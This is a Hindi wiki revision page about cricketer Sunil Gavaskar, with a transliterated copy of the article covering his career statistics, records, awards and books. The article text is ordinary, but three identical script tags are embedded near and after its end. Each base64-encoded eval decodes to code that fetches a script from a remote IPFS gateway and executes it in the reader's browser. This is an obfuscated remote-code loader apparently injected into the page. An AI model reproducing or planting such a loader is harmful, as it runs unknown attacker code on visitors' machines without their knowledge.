Difference between revisions of "सुनील गावस्कर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "==टीका टिप्पणी और संदर्भ==" to "{{संदर्भ ग्रंथ}} ==टीका टिप्पणी और संदर्भ==")
Line 71: Line 71:
 
*उनकी पत्नी का नाम मार्शनील है। इनके पुत्र [[रोहन गावस्कर]] भी भारतीय क्रिकेट टीम में खेल चुके हैं।
 
*उनकी पत्नी का नाम मार्शनील है। इनके पुत्र [[रोहन गावस्कर]] भी भारतीय क्रिकेट टीम में खेल चुके हैं।
 
==बल्लेबाज़ी कीर्तिमान==
 
==बल्लेबाज़ी कीर्तिमान==
इन्होंने [[बल्लेबाज़ी]] से संबंधित कई कीर्तिमान स्थापित किए। गावस्कर (अपने समय काल में) ने विश्व क्रिकेट में 3 बार, एक वर्ष में एक हज़ार रन, सर्वाधिक शतक (34), सर्वाधिक रन (नौ हज़ार से अधिक), सर्वाधिक शतकीय भागेदारियाँ एवं प्रथम श्रृंखला में सर्वाधिक रन बनाने वाले एकमात्र बल्लेबाज थे। 'सनी' गावस्कर की हर पारी एवं रन ऐतिहासिक होते हैं। उन्होंने भारतीय टीम का कुशल नेतृत्व किया और कई महत्त्वपूर्ण विजयें प्राप्त कीं, जिनमें 'एशिया कप' एवं 'बेसन एंण्ड हेजेस विश्वकप' (BENSON & HAZES WORLD CUP) प्रमुख है। 'क्रिकेट के आभूषण' कहे जाने वाले गावस्कर ने एक दिवसीय मैचों में भी अपनी टीम के लिए ठोस आधार प्रस्तुत किया है। वे 100 कैंचों का कीर्तिमान भी [[इंग्लैंड]] में बना चुके हैं। गावस्कर क्रिकेट की एक अद्वितीय पहेली हैं। 1986 में उनके खेल जीवन का उत्तरार्द्ध होने के बाद भी उनके खेल में और निखार आया। अपने कॉलेज की ओर से क्रिकेट खेलते समय भी वे सबसे सफल बल्लेबाज माने जाते थे। 1971 में उन्हें टैस्ट टीम के वेस्टइंडीज दौरे के लिए चुना गया था। सनी को विश्व का सर्वोपरी खिलाड़ी माना जाता है।  
+
इन्होंने [[बल्लेबाज़ी]] से संबंधित कई कीर्तिमान स्थापित किए। गावस्कर (अपने समय काल में) ने विश्व क्रिकेट में 3 बार, एक वर्ष में एक हज़ार रन, सर्वाधिक शतक (34), सर्वाधिक रन (नौ हज़ार से अधिक), सर्वाधिक शतकीय भागेदारियाँ एवं प्रथम श्रृंखला में सर्वाधिक रन बनाने वाले एकमात्र बल्लेबाज थे। 'सनी' गावस्कर की हर पारी एवं रन ऐतिहासिक होते हैं। उन्होंने भारतीय टीम का कुशल नेतृत्व किया और कई महत्त्वपूर्ण विजयें प्राप्त कीं, जिनमें 'एशिया कप' एवं 'बेसन एंण्ड हेजेस विश्वकप' (BENSON & HAZES WORLD CUP) प्रमुख है। [[चित्र:Sunil-Gavaskar-2.jpg|thumb|left|सुनील गावस्कर]] 'क्रिकेट के आभूषण' कहे जाने वाले गावस्कर ने एक दिवसीय मैचों में भी अपनी टीम के लिए ठोस आधार प्रस्तुत किया है। वे 100 कैंचों का कीर्तिमान भी [[इंग्लैंड]] में बना चुके हैं। गावस्कर क्रिकेट की एक अद्वितीय पहेली हैं। 1986 में उनके खेल जीवन का उत्तरार्द्ध होने के बाद भी उनके खेल में और निखार आया। अपने कॉलेज की ओर से क्रिकेट खेलते समय भी वे सबसे सफल बल्लेबाज माने जाते थे। 1971 में उन्हें टैस्ट टीम के वेस्टइंडीज दौरे के लिए चुना गया था। सनी को विश्व का सर्वोपरी खिलाड़ी माना जाता है।  
 
==पुरस्कार==
 
==पुरस्कार==
 
भारत में सुनील गावस्कर को 1975 में 'अर्जुन पुरस्कार' एवं 1980 में '[[पद्म भूषण]]' प्राप्त हुआ। इसके अतिरिक्त कई देशों में उन्हें सम्मानित किया जा चुका है। 1980 में ही वे 'विस्डेन' भी प्राप्त कर चुके हैं।  
 
भारत में सुनील गावस्कर को 1975 में 'अर्जुन पुरस्कार' एवं 1980 में '[[पद्म भूषण]]' प्राप्त हुआ। इसके अतिरिक्त कई देशों में उन्हें सम्मानित किया जा चुका है। 1980 में ही वे 'विस्डेन' भी प्राप्त कर चुके हैं।  

Revision as of 07:45, 29 April 2011

sunil gavaskar
vyaktigat parichay
poora nam sunil manohar gavaskar
any nam sani
janm 10 julaee, 1949
janm bhoomi muanbee (maharashtr)
ooanchaee 5 phut 5 ianch
patni marshanil
santan putr- rohan gavaskar
khel parichay
ballebazi shaili daean hath
tim bharat, muanbee aur samaraset
bhoomika ballebaj
pahala test 6 march, 1971 (vestiandij ke viruddh)
akhiri test 13 march, 1987 (pakistan ke viruddh)
pahala vanade 13 julaee, 1974 (ianglaiand ke viruddh)
akhiri vanade 5 navanbar, 1987 (ianglaiand ke viruddh)[1]
kairiyar aank de
praroop test kriket ekadivasiy antarrashtriy ti-20 antarrashtriy
muqabale 125 108 0
banaye gaye ran 10122 3092 0
ballebazi ausat 51.12 35.13 o
100/50 34/45 1/27 0
sarvochch skor 236* 103* 0
pheanki gee geandean 380 20 0
viket 1 1 0
geandabazi ausat 206.00 25.00 0
pari mean 5 viket 0 0 0
muqabale mean 10 viket 0 0 0
sarvochch geandabazi 1/34 1/10 0
kaich/stampiang 108 22 0
bahari k diyaan espncricinfo
adyatan

ballebazi kirtiman

inhoanne ballebazi se sanbandhit kee kirtiman sthapit kie. gavaskar (apane samay kal mean) ne vishv kriket mean 3 bar, ek varsh mean ek hazar ran, sarvadhik shatak (34), sarvadhik ran (nau hazar se adhik), sarvadhik shatakiy bhagedariyaan evan pratham shrriankhala mean sarvadhik ran banane vale ekamatr ballebaj the. 'sani' gavaskar ki har pari evan ran aitihasik hote haian. unhoanne bharatiy tim ka kushal netritv kiya aur kee mahattvapoorn vijayean prapt kian, jinamean 'eshiya kap' evan 'besan eannd hejes vishvakap' (BENSON & HAZES WORLD CUP) pramukh hai. thumb|left|sunil gavaskar 'kriket ke abhooshan' kahe jane vale gavaskar ne ek divasiy maichoan mean bhi apani tim ke lie thos adhar prastut kiya hai. ve 100 kaianchoan ka kirtiman bhi ianglaiand mean bana chuke haian. gavaskar kriket ki ek advitiy paheli haian. 1986 mean unake khel jivan ka uttararddh hone ke bad bhi unake khel mean aur nikhar aya. apane k aaulej ki or se kriket khelate samay bhi ve sabase saphal ballebaj mane jate the. 1971 mean unhean taist tim ke vestiandij daure ke lie chuna gaya tha. sani ko vishv ka sarvopari khila di mana jata hai.

puraskar

bharat mean sunil gavaskar ko 1975 mean 'arjun puraskar' evan 1980 mean 'padm bhooshan' prapt hua. isake atirikt kee deshoan mean unhean sammanit kiya ja chuka hai. 1980 mean hi ve 'visden' bhi prapt kar chuke haian.

mahattvapoorn pustakean

gavaskar ne kriket se sambandhit kee mahattvapoorn pustakean bhi likhi haian. jinamean sani dej, aidals, ras end rooians tatha van de vandars kafi lokapriy huee haian. akarshak vyaktitv ke svami sunil gavaskar ek film mean bhi abhinay kar chuke haian.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

  1. Sunil Gavaskar (aangrezi) (ech.ti.em.el) espncricinfo. abhigaman tithi: 21 janavari, 2011.

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>